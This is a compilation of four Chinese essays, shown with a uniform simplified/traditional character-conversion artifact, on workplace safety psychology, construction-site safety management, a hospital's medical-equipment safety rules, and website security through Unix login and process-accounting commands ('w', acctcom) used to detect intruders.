第一篇：淺談安全行為科學(xué)與安全管理

淺談安全行為科學(xué)與安全管理

一般地說，企業(yè)生產(chǎn)過程中發(fā)生事故的原因可歸為內(nèi)因與外因兩大類。內(nèi)因是指勞動(dòng)者的技術(shù)、心理活動(dòng)等方面出現(xiàn)了與企業(yè)要求不相協(xié)調(diào)的情況：外因是指設(shè)備狀況、預(yù)防措施、防護(hù)用品以及勞動(dòng)環(huán)境的條件不符合安全生產(chǎn)的要求。國內(nèi)外大量事故統(tǒng)計(jì)表明，在企業(yè)內(nèi)所發(fā)生的事故中，70%~75%是由于勞動(dòng)者的操作行為發(fā)生錯(cuò)誤或違章作業(yè)所引起的。而心理學(xué)研究告訴我們，人的行為是由人的心理狀態(tài)支配的。因此，安全管理人員在分析和研究事故發(fā)生的內(nèi)因條件時(shí)，必須調(diào)查事故發(fā)生時(shí)人們的心理活動(dòng)，亦即借助于心理學(xué)的理論和研究成果來指導(dǎo)安全管理工作。

行為科學(xué)是從社會(huì)學(xué)和心理學(xué)的角度研究行為的一門科學(xué)，它是研究人的行為規(guī)律，主要研究工作環(huán)境中個(gè)人和群體的行為。

安全行為科學(xué)是行為科學(xué)的重要應(yīng)用分支，安全行為科學(xué)不但要應(yīng)用行為科學(xué)研究的成果為其服務(wù)，同時(shí)安全行為科學(xué)為行為科學(xué)豐富了內(nèi)容和擴(kuò)大了內(nèi)涵。因此，安全行為科學(xué)與行為科學(xué)是相互交*和兼容的關(guān)系，是行為科學(xué)在安全中應(yīng)用而發(fā)展起來的應(yīng)用性科學(xué)。人的安全行為是復(fù)雜和動(dòng)態(tài)的，具有多樣性、計(jì)劃性、目的性、可塑性，并受安全意識(shí)水平的調(diào)節(jié)，受思維、情感、意志等心理活動(dòng)的支配；同時(shí)受道德觀、人生觀和世界觀的影響：態(tài)度、意識(shí)、知識(shí)、認(rèn)知決定人的安全行為水平。

影響人的安全行為的個(gè)性心理因素有以下幾個(gè)方面：

1.情緒對(duì)人的安全行為的影響。情緒為每個(gè)人所固有、受客觀事物影響的一種外在表現(xiàn)，這種表現(xiàn)是體驗(yàn)又是反應(yīng)，是沖動(dòng)又是行為。

2.氣質(zhì)對(duì)安全行為影響。氣質(zhì)是人的個(gè)性的重要組成部分，它是一個(gè)人所具有典型的、穩(wěn)定的心理特征。氣質(zhì)使個(gè)人的安全行為表現(xiàn)為獨(dú)特的個(gè)人特色。人的氣質(zhì)對(duì)人的安全行為有很大的影響，使每個(gè)人都有不同的特點(diǎn)和安全工作適宜性。

3.性格對(duì)人的安全行為的影響。人的性格是每個(gè)人所固有的、最主要的、最顯著的心理特征，是對(duì)某一事物穩(wěn)定的和習(xí)慣化的表現(xiàn)方式。性格表現(xiàn)在人的活動(dòng)目的上，也表現(xiàn)在達(dá)到目的行為方式上。

影響人的安全行為的社會(huì)心理因素

1.社會(huì)感知對(duì)人的安全行為影響。感知是眼前客觀刺激物的整體屬性在人頭腦中的反映，人的社會(huì)感知與客觀事物的本來面貌經(jīng)常是不一致的，這就是使人產(chǎn)生錯(cuò)誤的知覺或者偏見，使客觀事物的本來面目在自己的知覺中發(fā)生歪曲。

2.表現(xiàn)在價(jià)值觀對(duì)人的行為影響。領(lǐng)導(dǎo)和職工對(duì)安全價(jià)值的認(rèn)識(shí)不同，會(huì)從其對(duì)安全的態(tài)度和行為上表現(xiàn)出來。

3.角色對(duì)人的行為影響。角色實(shí)現(xiàn)過程就是個(gè)人適應(yīng)環(huán)境的過程在安全管理中，需要利用人的這種角色為其服務(wù)。

其中社會(huì)感知對(duì)人的安全行為影響最大，長時(shí)間影響可使人產(chǎn)生一種潛意識(shí)(或下意識(shí))的安全行為。

影響安全行為的主要社會(huì)因素

1.社會(huì)輿論對(duì)安全行為的影響。包括社會(huì)輿論的監(jiān)督和社會(huì)輿論的宣傳?；谶@個(gè)原因通過各種形式在施工現(xiàn)場進(jìn)行安全宣傳活動(dòng)及目前社會(huì)輿論對(duì)安全生產(chǎn)監(jiān)督是很有必要的。如“萬里行”和“安全月”等安全宣傳活動(dòng)及各種安全事故調(diào)查和處理的報(bào)道。

2.風(fēng)俗與時(shí)尚對(duì)個(gè)人安全行為影響。風(fēng)俗與時(shí)尚對(duì)安全行為的影響既有利的一面，也有不利的一面，我們可以通過企業(yè)安全文化的建設(shè)實(shí)現(xiàn)揚(yáng)其長，避其短。

環(huán)境狀況對(duì)人的安全行為的影響

人的安全行為除內(nèi)因影響外，還有外因(環(huán)境)的影響。環(huán)境變化會(huì)刺激人的心理，影響

人的情緒，甚至打亂人的正常行動(dòng)，物的運(yùn)行失常及布置不當(dāng)會(huì)影響人的識(shí)別與操作，造成混亂和差錯(cuò)，打亂人的正?；顒?dòng)。

企業(yè)安全價(jià)值觀規(guī)律處于中心支配地位，而物的規(guī)律和職工心理運(yùn)動(dòng)規(guī)律是安全價(jià)值觀規(guī)律的基礎(chǔ)，左右著安全價(jià)值觀規(guī)律的運(yùn)動(dòng)方式。物的規(guī)律影響著職工心理運(yùn)動(dòng)方式和安全價(jià)值觀，職工心理運(yùn)動(dòng)規(guī)律同樣也影響著物的規(guī)律和企業(yè)安全價(jià)值觀規(guī)律。從實(shí)際情況分析，職工心理規(guī)律可能是決定安全生產(chǎn)的最基礎(chǔ)最直接的因素。這是因?yàn)椋弘S著改革的逐步深入，企業(yè)管理方式正在或已經(jīng)發(fā)生了深刻變化。

目前很多國外企業(yè)的安全研究出現(xiàn)的一個(gè)新現(xiàn)象是越來越重視對(duì)職工個(gè)人思想和行為特征對(duì)安全生產(chǎn)影響的研究，比如酗酒和濫用藥物對(duì)安全的影響、比如工作壓力和職工的精神耗竭問題的研究、比如顯示屏對(duì)人體進(jìn)而對(duì)職工身心健康的影響等等。

影響安全行為的心理因素實(shí)證分析

職工心理呈現(xiàn)復(fù)雜多元性，但并非毫無規(guī)律性。安全心理學(xué)中有一個(gè)著名的事故傾向理論假說。它認(rèn)為，事故總是由少數(shù)幾個(gè)人造成的，即50%的事故是由10%的人造成的。

1)小部分工人(如20%)造成了大部分(70%)事故。國外的另一項(xiàng)研究結(jié)果認(rèn)為，事故年齡為17-28歲之間的人群中最頻繁，50-60歲的人群中達(dá)到最低。

2)工種越特殊、工藝越復(fù)雜，對(duì)人的心理素質(zhì)要求越高。國外的研究認(rèn)為，工人的知覺技能等于或高于運(yùn)動(dòng)技能，工人就相對(duì)安全；但是當(dāng)知覺水平低于運(yùn)動(dòng)水平，雇員就有事故傾向，并且二者差異越大，事故傾向越大，通俗地說，反應(yīng)速度快于知覺速度的工人更可能發(fā)生事故。

3)絕大多數(shù)事故發(fā)生在工作的中后期，而此階段恰恰是職工心理呈現(xiàn)“云團(tuán)狀”。眾所周知，企業(yè)管理理論已經(jīng)從18世紀(jì)的“經(jīng)濟(jì)人”、20世紀(jì)30年代的“社會(huì)人”、60年代的“自我實(shí)現(xiàn)人”發(fā)展到今天的“復(fù)雜人”(60年代由美國心理學(xué)家E?H?沙因提出)。復(fù)雜人理論認(rèn)為，人的需要的動(dòng)機(jī)模式是多種多樣的，因此管理需要“常變”。這個(gè)重要管理思想對(duì)安全管理的啟發(fā)就是，企業(yè)制定安全政策、進(jìn)行安全管理要建立在“復(fù)雜人”的基礎(chǔ)之上，把“人”想得復(fù)雜些，而不能把“人”當(dāng)成是執(zhí)行政策的機(jī)器。怎樣把“人”想得復(fù)雜些呢?有以下幾個(gè)方面

(一)注意力問題：注意(at-tention)，是指心理活動(dòng)對(duì)定對(duì)象的有選擇的集中。注意具有選擇的功能，這就是使心理活動(dòng)指向于那些有意義的、符合需要的、與當(dāng)前活動(dòng)相一致的各種刺激，而避開或抑制那些無意義的、附加的、干擾當(dāng)前活動(dòng)的各種刺激，也就是使心理活動(dòng)具有一定的方向性；注意具有保持功能，即當(dāng)外界大量信息進(jìn)入感知記憶以后，每個(gè)信息單元必須經(jīng)過注意才能轉(zhuǎn)換成一種更持久的形式而得到保持；注意具有對(duì)活動(dòng)進(jìn)行調(diào)節(jié)和監(jiān)督的功能。因此研究人的注意問題對(duì)實(shí)踐、對(duì)安全生產(chǎn)關(guān)系極大。

安全管理者的責(zé)任在研究職工注意力問題時(shí)，須把握好職工的注意分配和注意廣度。研究表明，注意分配取決于同時(shí)并進(jìn)的幾種活動(dòng)的性質(zhì)、復(fù)雜程度以及對(duì)活動(dòng)的熟悉或熟練程度。也就是說在安排工作時(shí)要盡可能避免同時(shí)做二種及以上不同性質(zhì)的活動(dòng)，活動(dòng)的難易程度要配合得當(dāng)，要加強(qiáng)職工的技能訓(xùn)練以提高職工現(xiàn)場的注意力；在注意廣度方面，相關(guān)的研究表明注意的對(duì)象越集中，排列得越有規(guī)律，越能成為相互聯(lián)系的整體，從而職工在同一時(shí)間內(nèi)能夠清楚地覺察或認(rèn)識(shí)客體的數(shù)量就越多。注意的廣度也隨著活動(dòng)的任務(wù)和個(gè)人的知識(shí)經(jīng)驗(yàn)不同有所不同，因此，提高活動(dòng)的意義性、趣味性，也是提高注意廣度的有效辦法。

(二)疲勞問題：疲勞是指因持續(xù)工作造成體力及工作效率下降并伴隨著疲憊感的生理現(xiàn)象。它具有“一過性”特點(diǎn)，即經(jīng)過休息一般都可恢復(fù)過來。疲勞分生理疲勞和心理疲勞兩種。生理疲勞又稱肌肉疲勞或體力疲勞。這在現(xiàn)代化大型企業(yè)中，更多的是心理疲勞，即主觀疲勞或精神疲勞。

疲勞隨工作時(shí)間延長而增強(qiáng)。在開始階段，人的工作能力逐步釋放出來，隨即達(dá)到最佳狀態(tài)，經(jīng)過一段時(shí)間，由于持續(xù)工作，疲勞不斷積累，人的工作能力開始下降，出現(xiàn)疲勞現(xiàn)象。值得注意的是如果造成過度疲勞后，即使按作息時(shí)間休息，也不能使工作能力得到充分恢復(fù)。

(三)情緒的問題：情緒是意識(shí)中最重要的構(gòu)成因素，對(duì)人格的整合提供動(dòng)機(jī)。一方面，情緒對(duì)人的認(rèn)知的發(fā)展和認(rèn)知活動(dòng)起著監(jiān)督作用。在情緒一一認(rèn)知運(yùn)動(dòng)的相互作用中，情緒是認(rèn)知發(fā)展的契機(jī)，它激發(fā)人去認(rèn)知、去行動(dòng)，例如，興趣激起研究行為，決定認(rèn)知的選擇性和方向：而痛苦、憤怒或緊張的情緒則使認(rèn)知活動(dòng)變得刻板和狹窄+限制知覺和思維，并干擾利用線索和采取變式。另一方面，情緒對(duì)人格的整合提供動(dòng)機(jī)。因此，安全管理者掌握好情緒理論，把握好職工情緒特點(diǎn)，調(diào)節(jié)好職工情緒對(duì)于職工很好地認(rèn)知企業(yè)安全價(jià)值觀、保證安全生產(chǎn)有著十分重要的現(xiàn)實(shí)意義。

第二篇：安全行為科學(xué)在建筑工程中應(yīng)用

安全管理科學(xué)在建筑工程中應(yīng)用

姓名：陳松 學(xué)號(hào)：05109230 專業(yè)：土木工程（民用）

摘 要:安全問題是工程建設(shè)的一個(gè)重大問題,需要在建筑工程中引入安全管理科學(xué)的指導(dǎo),依據(jù)建筑工程安全問題和安全事故問題,提出了加強(qiáng)當(dāng)前建筑工程中安全管理科學(xué)在建筑工程中的幾點(diǎn)建議,目的是為了進(jìn)一步預(yù)防和有效管理建筑工程項(xiàng)目，完善建筑工程中的安全管理措施。

關(guān)鍵詞:建筑工程;安全管理;科學(xué)管理

建筑業(yè)的生產(chǎn)活動(dòng)危險(xiǎn)性大，不安全因素多，是事故多發(fā)行業(yè)。近幾年我國建筑業(yè)的死亡率是所有工業(yè)部門中僅次于采礦業(yè)的最高的行業(yè)，損失巨大，令人痛心?，F(xiàn)在需要應(yīng)用科學(xué)的現(xiàn)代企業(yè)安全管理模式，不斷提高安全管理水平，真正把安全管理工作做好。因此，做為建筑企業(yè)，應(yīng)認(rèn)真研究建筑業(yè)安全管理的現(xiàn)狀，樹立新的安全管理的理念。

一、建筑業(yè)項(xiàng)目安全管理的現(xiàn)狀

（一）建筑業(yè)的安全事故絕大部分發(fā)生在施工現(xiàn)場，可以說，施工項(xiàng)目是事 故發(fā)生的發(fā)源地。

因此，我們必須對(duì)我們的項(xiàng)目安全管理模式是否滿足安全管理科學(xué)的需要、是否符合項(xiàng)目管理的特點(diǎn)、是否滿足國家和行業(yè)法律、法規(guī)的要求進(jìn)行認(rèn)真分析，從而，達(dá)到改進(jìn)或更新項(xiàng)目安全管理模式的目的。

（二）安全事故的原因分析

1.人的不安全管理，是事故的直接原因。

所謂人的原因，是指由于人的不安全管理導(dǎo)致在生產(chǎn)過程中發(fā)生的各類事故。人在生產(chǎn)活動(dòng)中，具體不安全管理有：操作錯(cuò)誤（啟動(dòng)操作不給信號(hào)、忘記關(guān)設(shè)備）、奔跑作業(yè)、送料過快、以不安全的速度作業(yè)；使用不安全設(shè)備；用手代替工具操作；物體的擺放不安全；冒險(xiǎn)進(jìn)入危險(xiǎn)場所；在起吊物下停留作業(yè)；機(jī)器運(yùn)轉(zhuǎn)時(shí)加油、清潔、修理；有分散注意力的行為；未使用防護(hù)用品；不安全著裝；工作時(shí)說笑打鬧、帶電作業(yè)等。

2.物（設(shè)備）的不安全狀態(tài)，也是事故的直接原因。

對(duì)建筑行業(yè)來說，“物”包括施工過程中所涉及的設(shè)備、材料、半成品、燃料、施工機(jī)械、機(jī)具、設(shè)施等。不安全的情況有：施工電梯的限位失靈，造成冒頂；塔吊的鋼絲繩脫絲；未及時(shí)更換，造成鋼絲繩斷裂，掉物墜落；電鋸等用電設(shè)備電線老化，造成電線失火等。

I

3.不良的生產(chǎn)環(huán)境對(duì)人的行為和物的狀態(tài)產(chǎn)生負(fù)面影響。

事故的發(fā)生都是由于人的不安全管理和物的不安全狀態(tài)直接引起的。但不考慮客觀的情況而一概指責(zé)施工人員的“粗心大意”、“疏忽”也是片面的，有時(shí)甚至是錯(cuò)誤的。還應(yīng)當(dāng)進(jìn)一步研究造成人的過失的背景條件，即不安全環(huán)境，如照明光線過暗或過強(qiáng)導(dǎo)致作業(yè)現(xiàn)場視物不清；作業(yè)場所狹窄、雜亂；地面有油或其他影響環(huán)境的東西等。與建筑行業(yè)緊密相關(guān)的環(huán)境，就是施工現(xiàn)場。整潔、有序、精心布置的施工現(xiàn)場，事故發(fā)生率較之雜亂的現(xiàn)場肯定低。到處是施工材料、機(jī)具亂擺放，生產(chǎn)及生活用電私拉亂扯，不但給正常生產(chǎn)、生活帶來不便，而且會(huì)引起人的煩躁情緒，從而增加事故隱患。當(dāng)然，人文環(huán)境也是不能忽略的。如果某企業(yè)從領(lǐng)導(dǎo)到職工，人人講安全，重視安全，逐漸形成安全氛圍，更深層次地講，就是形成了企業(yè)安全文化，那么這個(gè)企業(yè)的安全狀況肯定良好。

4.管理的欠缺是事故發(fā)生的重要因素，有時(shí)甚至是直接的因素。

人的不安全管理和物的不安全狀態(tài)是事故發(fā)生的直接原因，都與管理有直接的關(guān)系，因此，管理不善是造成安全事故的間接原因。人的不安全管理可以通過安全教育、安全生產(chǎn)責(zé)任制以及安全獎(jiǎng)懲機(jī)制等措施減少甚至杜絕。物的不安全狀態(tài)可以通過提高安全生產(chǎn)的科技含量、建立完善的設(shè)備保養(yǎng)制度、推行文明施工和安全達(dá)標(biāo)等活動(dòng)予以控制。對(duì)作業(yè)現(xiàn)場加強(qiáng)安全檢查，就可以發(fā)現(xiàn)并制止人的不安全管理和物的不安全狀態(tài)，從而避免事故的發(fā)生。常見的管理缺陷有制度不健全、責(zé)任不分明、有法不依、違章指揮、安全教育不夠、處罰不嚴(yán)、安全技術(shù)措施不全面、安全檢查不夠等。

由此看來，安全管理的目的就是保證良好的施工環(huán)境，保證人和物的安全狀態(tài)，這些都需要通過建立科學(xué)、合理的安全管理模式，并通過安全管理模式的正常運(yùn)行來達(dá)到目的。

二、建筑安全的管理措施

（一）改變安全管理科學(xué)教育的現(xiàn)狀，實(shí)行分級(jí)負(fù)責(zé)、分級(jí)教育。

各類人員必須具備相應(yīng)執(zhí)業(yè)資格才能上崗。所有新員工或從事新的工作必須經(jīng)過三級(jí)安全教育，即公司、項(xiàng)目部、班組的安全教育，并要定期培訓(xùn)，不斷學(xué)習(xí)新工藝、新技術(shù)，強(qiáng)化工程特點(diǎn)所帶來的安全風(fēng)險(xiǎn)和具體作業(yè)安全要求。

（二）加大科技投入，做好科研合作。

鼓勵(lì)施工企業(yè)加大安全生產(chǎn)的科技投入，加強(qiáng)與科研單位和高等院校合作，研究、開發(fā)、推廣一批安全適用、先進(jìn)可靠的生產(chǎn)工藝、技術(shù)措施和裝備，淘汰落后工藝，通過科技進(jìn)步提高企業(yè)的安全生產(chǎn)保證能力和安全生產(chǎn)水平，要充分利用中介機(jī)構(gòu)和社會(huì)力量做好工程質(zhì)量安全監(jiān)督工作，充分發(fā)揮中介機(jī)構(gòu)和社會(huì)監(jiān)督的制約作用，從而把質(zhì)量安全的監(jiān)管工作全面引向深入。

II

（三）加強(qiáng)風(fēng)險(xiǎn)評(píng)估，做好重點(diǎn)管理。

建筑施工企業(yè)應(yīng)針對(duì)不同的項(xiàng)目特點(diǎn)和不同的施工階段分析安全風(fēng)險(xiǎn)，作出評(píng)估，并對(duì)每個(gè)項(xiàng)目具體化，做好安全防護(hù)和重點(diǎn)管理。

（四）編制安全措施，執(zhí)行科學(xué)程序。

按照建筑施工安全法規(guī)標(biāo)準(zhǔn)的要求，結(jié)合工程的特點(diǎn)編制安全技術(shù)措施，遇有特殊作業(yè)（深基坑、起重吊裝、模板支撐、人工挖孔樁、臨時(shí)用電等）還要編制單項(xiàng)安全施工組織設(shè)計(jì)方案，并按程序經(jīng)審核批準(zhǔn)后才能進(jìn)行。

（五）搞好“五定”，認(rèn)真落實(shí)。

對(duì)查出的安全隱患要做到“五定”，即定整改責(zé)任人，定整改措施，定整改完成時(shí)間，定整改完成人，定整改驗(yàn)收人。

三、項(xiàng)目安全管理模式

（一）全員安全管理科學(xué)管理模式

1.注重培育全員安全管理科學(xué)的文化

這種全員安全管理科學(xué)管理模式是“全員、全方位、全過程、全天候”的管理，因此，其安全文化應(yīng)該是全員安全文化。形成新的安全文化就是要培育全員安全文化。全員管理不僅包括總承包管理人員、分包管理人員和全體工人，還應(yīng)包括業(yè)主、設(shè)計(jì)、監(jiān)理及社會(huì)相關(guān)方。

作為總承包方，要積極調(diào)動(dòng)和發(fā)揮相關(guān)各方安全管理的監(jiān)督作用，使安全管理成為壓倒一切的工作。當(dāng)然，首先要充分調(diào)動(dòng)本單位全員安全管理的積極性，形成全員安全文化。只有形成全員安全文化，才能營造安全生產(chǎn)的氛圍，保障人員安全。全員安全文化是新的項(xiàng)目安全模式的核心。

2.全員安全管理科學(xué)管理模式的四個(gè)轉(zhuǎn)變

全員安全管理科學(xué)管理模式與傳統(tǒng)的項(xiàng)目安全模式相比，有四個(gè)轉(zhuǎn)變，分別是：變單純的安全專業(yè)人員的崗位安全管理為全員參加的體系安全管理；變單純的安全管理為安全管理與進(jìn)度、工序穿插和施工方法緊密結(jié)合的綜合管理；變以點(diǎn)為主的間斷的、靜止的管理為線面結(jié)合的、連續(xù)的、動(dòng)態(tài)的管理；變并行的安全與生產(chǎn)兩條線為安全與生產(chǎn)緊密結(jié)合的安全生產(chǎn)一條線。

3.全員參與是全員安全管理模式的核心

全員安全管理模式下，項(xiàng)目安全管理組織已經(jīng)不再是單獨(dú)的崗位安全管理組織，而是以項(xiàng)目經(jīng)理為首的，以專職的崗位安全管理為核心，以各專業(yè)工程師為 III

骨干，班組長及工人全員參與的，安全監(jiān)督管理層和安全管理實(shí)施層既獨(dú)立設(shè)置又互相依托和緊密聯(lián)系的體系安全管理，是將生產(chǎn)與安全的緊密結(jié)合的組織，是對(duì)項(xiàng)目安全管理資源的充分挖掘和充分利用。

（二）安全目標(biāo)管理模式

隨著安全管理工作的不斷進(jìn)步，安全管理由定性逐漸走向定量，先進(jìn)管理經(jīng)驗(yàn)和方法得以迅速推廣。目標(biāo)管理應(yīng)用于安全管理方面，稱之為安全目標(biāo)管理。它是生產(chǎn)企業(yè)確定在一定時(shí)期內(nèi)應(yīng)該達(dá)到的安全總目標(biāo)，分解展開、落實(shí)措施、嚴(yán)格考核，通過組織內(nèi)部自我控制達(dá)到安全目的的一種安全管理方法。它以總的安全管理目標(biāo)為基礎(chǔ)，逐級(jí)向下分解，使各級(jí)安全目標(biāo)明確、具體，各方面關(guān)系協(xié)調(diào)、一致，把全體成員都科學(xué)地組織在目標(biāo)體系之內(nèi)，使每個(gè)人都明確自己在目標(biāo)體系中所占的地位和作用，通過每個(gè)人的積極努力來實(shí)現(xiàn)特定組織的安全目標(biāo)。

制定安全目標(biāo)要具體，根據(jù)實(shí)際情況可以設(shè)置若干個(gè)，例如事故發(fā)生率指標(biāo)，傷害嚴(yán)重指標(biāo)，事故損失指標(biāo)或安全技術(shù)措施項(xiàng)目完成率等。但是，目標(biāo)不宜太多，以免力量過于分散，應(yīng)將重點(diǎn)工作首先列入目標(biāo)，并將各項(xiàng)目標(biāo)按其重要性分成等級(jí)或序列。各項(xiàng)目標(biāo)應(yīng)能數(shù)量化，以便考核和衡量。

參 考 文 獻(xiàn)

[1]王建華,孫啟燕.試論建筑工程與安全工程[J].人民黃河,2004,26(10):33-36.[2]浪底工程咨詢公司.關(guān)于施工安全工作的實(shí)施意見[R].鄭州:建筑委員 會(huì),2001.[3]山西省萬家寨引黃工程公司.山西省萬家寨引黃工程施工期規(guī)定[R].1999.IV

第三篇：質(zhì)量與安全管理

烏蘭浩特市人民醫(yī)院

器械科醫(yī)療設(shè)備質(zhì)量與安全管理小組

一、醫(yī)療設(shè)備質(zhì)量與安全管理小組成員

組

長： 陳鵬義

成員： 于洋

邢有

張國晉

設(shè)備使用監(jiān)管：于洋

放射機(jī)房監(jiān)測：邢有 特殊裝備監(jiān)測：于洋

烏蘭浩特市人民醫(yī)院

醫(yī)療設(shè)備質(zhì)量與安全管理小組職責(zé)

1、組長負(fù)責(zé)落實(shí)“醫(yī)療裝備質(zhì)量與安全管理”內(nèi)容要求，建立醫(yī)療裝備質(zhì)量管理小組及制度，體現(xiàn)對(duì)全院的設(shè)備質(zhì)量全面管理。

2、醫(yī)療裝備質(zhì)量與安全管理小組至少每半年召開會(huì)議一次，遇特殊情況隨時(shí)召開，討論總結(jié)全院的醫(yī)療設(shè)備運(yùn)行情況，對(duì)存有缺陷的科室發(fā)《醫(yī)療裝備質(zhì)量持續(xù)改進(jìn)反饋表》，并針對(duì)所發(fā)現(xiàn)的制度和流程上存在的問題，提出改進(jìn)措施，并在下一次會(huì)議中對(duì)改進(jìn)措施的效果進(jìn)行評(píng)價(jià)，以做到醫(yī)療裝備質(zhì)量的持續(xù)改進(jìn)。

3、嚴(yán)格做好設(shè)備使用情況監(jiān)管、放射機(jī)房監(jiān)測等工作，認(rèn)真聽取使用科室對(duì)醫(yī)療設(shè)備使用管理方面的意見及建議

4、對(duì)各科室服務(wù)過程中不足的地方應(yīng)及時(shí)改進(jìn)。

5、制定全員培訓(xùn)計(jì)劃，做到知識(shí)不斷更新，積極引進(jìn)新技術(shù)新業(yè)務(wù)。

烏蘭浩特市人民醫(yī)院

醫(yī)療裝備質(zhì)量與安全管理制度

1.重點(diǎn)抓好醫(yī)療裝備核心制度的落實(shí)：醫(yī)療裝備的管理、使用、維修、裝備意外應(yīng)急管理等制度。

2．加強(qiáng)醫(yī)療裝備質(zhì)量關(guān)鍵環(huán)節(jié)的管理。

3．加強(qiáng)全員質(zhì)量和安全教育，牢固樹立質(zhì)量和安全意識(shí)，提高全員質(zhì)量管理與改進(jìn)的意識(shí)和參與能力，嚴(yán)格執(zhí)行《醫(yī)療設(shè)備安全管理制度與規(guī)范》。

4.設(shè)備使用監(jiān)管組每月隨機(jī)下科檢查一次，機(jī)房監(jiān)測與特殊設(shè)備監(jiān)測組每季度下科檢查一次。

5．加強(qiáng)全員培訓(xùn)，全員“基礎(chǔ)理論、基本知識(shí)、基本技能”必須人人達(dá)標(biāo)。

6、按照中華人民共和國《放射性同位素與射線裝置放射防護(hù)條例》有關(guān)規(guī)定，實(shí)行許可登記制度，醫(yī)院內(nèi)有放射性同位素與射線裝置的科室必須向醫(yī)院上級(jí)主管部門申請(qǐng)?jiān)S可證。甲、乙類大型醫(yī)用設(shè)備必須辦理大型醫(yī)療設(shè)備配置許可證。

7、醫(yī)院所有醫(yī)療設(shè)備必須由廠家專業(yè)技術(shù)人員進(jìn)行安裝、調(diào)試或計(jì)量，驗(yàn)收合格后方可投入使用。

8、醫(yī)療設(shè)備的操作人員應(yīng)由廠家進(jìn)行專業(yè)培訓(xùn)后方可上機(jī)操作，大型醫(yī)療設(shè)備的操作人員須持上崗證，并嚴(yán)格按照每臺(tái)醫(yī)療設(shè)備操作規(guī)程執(zhí)行。

第四篇：畢業(yè)論文安全與管理

題 目：網(wǎng)站安全與管理

摘要

本文側(cè)重在網(wǎng)站安全方面來談，討論了網(wǎng)站常用的保護(hù)方法，詳細(xì)地分析比較了專用網(wǎng)站保護(hù)軟件采用的各種技術(shù)實(shí)現(xiàn)和優(yōu)缺點(diǎn)，并指出了其缺陷。安全雖不是使用某個(gè)工具或某些工具就可以解決的，但使用這些工具能幫助提高安全性，減少安全風(fēng)險(xiǎn)。只有更好的保障網(wǎng)站的安全，才能便于網(wǎng)站的管理。

關(guān)鍵詞： 安全配置、防火墻、網(wǎng)站安全

目錄

第一章

查出黑客所在

首先，就要查出黑客所在才能更好的防御。查出黑客所在有兩種方法：

1.用w指令查看系統(tǒng)信息

$w

9:01pm up 10:08, 1 user, load average: 0.08, 0.06, 0.05 User tty login@ idle JCPU PCPU what

notes console 10:54am 9days 28:04 23:29 /usr/dt/bin/dtscreen-mode blank

notes pts/2 10:54am 10:07 /sbin/sh notes pts/4 10:54am 10:06 /sbin/sh notes pts/5 10:56am 9:59 /sbin/sh

在w顯示信息的最開頭是發(fā)出w命令的時(shí)間、系統(tǒng)啟動(dòng)后的時(shí)間、及注冊(cè)在系統(tǒng)的用戶數(shù)。最后的三個(gè)數(shù)表示平均負(fù)載，即使用系統(tǒng)資源的程度，使用w命令給系統(tǒng)增加了0.08負(fù)載。其他兩個(gè)數(shù)字分別表示在最后5分鐘及十五分鐘內(nèi)系統(tǒng)的平均負(fù)載量。

注意：當(dāng)有人在猜password時(shí)，將會(huì)大大增加系統(tǒng)的平均負(fù)載。

2.進(jìn)程記帳

Unix 系統(tǒng)可以通過設(shè)置選項(xiàng)來讓核心在每個(gè)進(jìn)程結(jié)束時(shí)產(chǎn)生一個(gè)記錄。這些記錄所產(chǎn)生的報(bào)告被稱為進(jìn)程記帳。它包括進(jìn)程使用資源的信息，以及所執(zhí)行的命令名。如果運(yùn)行 的是調(diào)整用戶id程序，則還包括用戶名等。系統(tǒng)管理員可根據(jù)進(jìn)程記帳的CPU時(shí)間讓用戶交納上機(jī)費(fèi)，也可用進(jìn)程記帳來觀察某一用戶執(zhí)行了哪些命令。進(jìn)程記帳和審計(jì)是兩碼事，審計(jì)是監(jiān)視對(duì)安全性敏感的事件。進(jìn)程記帳并不記下所執(zhí)行 命令的參數(shù)，所以無法知道某一命令修改了哪個(gè)文件，甚至也不知道此命令的執(zhí)行是否成 功。但系統(tǒng)管理員仍然可以在進(jìn)程記帳中找出某些線索。基于System V的系統(tǒng)和基于BSD的系統(tǒng)在進(jìn)程記帳方面所采納的方法不同，命令也不 一樣。

2.1 System V記帳

在System V 中，進(jìn)程記帳保存在/usr/adm/pactt文件中。root可運(yùn)行/usr/lib/acct/startup 來啟動(dòng)進(jìn)程記帳。記帳信息的日常處理可用runacct命令來做，它會(huì)壓縮pacct文件。每月 的處理由shell程序monacct來完成。這兩個(gè)程序都在/usr/lib/acct目錄下。acctcom 命令可用來搜索pacct中的內(nèi)容，并產(chǎn)生報(bào)告。例如：查找用戶“tommy”在 10:00 至11:30這段時(shí)間內(nèi)所執(zhí)行的全部命令。$acctcom-u tommy-s 10:00-e 11:30 START BEF: Sat Oct 10 11:30:00 1998 END AFTER: Sat Oct 10 10:00:00 1998 COMMAND START END REAL CPU MEAN

NAME USER TTYNAME TIME TIME(SECS)(SECS)SIZE(K)cat tommy pts/3 11:01:13 11:01:13 0.02 0.02 492.00 mail tommy pts/3 11:01:13 11:01:13 0.02 0.02 876.00 clear tommy pts/3 11:01:14 11:01:14 0.03 0.01 744.00 ls tommy pts/3 11:01:16 11:01:16 0.03 0.03 776.00 date tommy pts/3 11:01:23 11:01:23 0.01 0.01 664.00

acctcom命令用來告訴系統(tǒng)管理員某一用戶干了些什么，而不是正在干什么，而且它指 列出了命令名，沒有參數(shù)。所以，從中發(fā)現(xiàn)一些線索，如可找出使用大量cpu時(shí)間的進(jìn)程(典型的是猜口令進(jìn)程)。

可用shell程序runacct來產(chǎn)生幾個(gè)報(bào)告。這些報(bào)告存放在/usr/adm/acct/sum目錄下，其文件名格式為rprtMMDD。報(bào)告的第一部分包含“變更”信息，如進(jìn)程記帳啟動(dòng)及關(guān)閉的 時(shí)間(關(guān)閉記帳可能是由于某人想隱藏某些活動(dòng)),以及系統(tǒng)時(shí)間的改變。第二部分是每個(gè) 用戶注冊(cè)到系統(tǒng)的時(shí)間以及有關(guān)每個(gè)端口的報(bào)告，還包括了每個(gè)端口上“接通”和“斷開” 的次數(shù)。“接通”表示一次成功的注冊(cè)，“斷開”表示退出系統(tǒng)或注冊(cè)失敗。

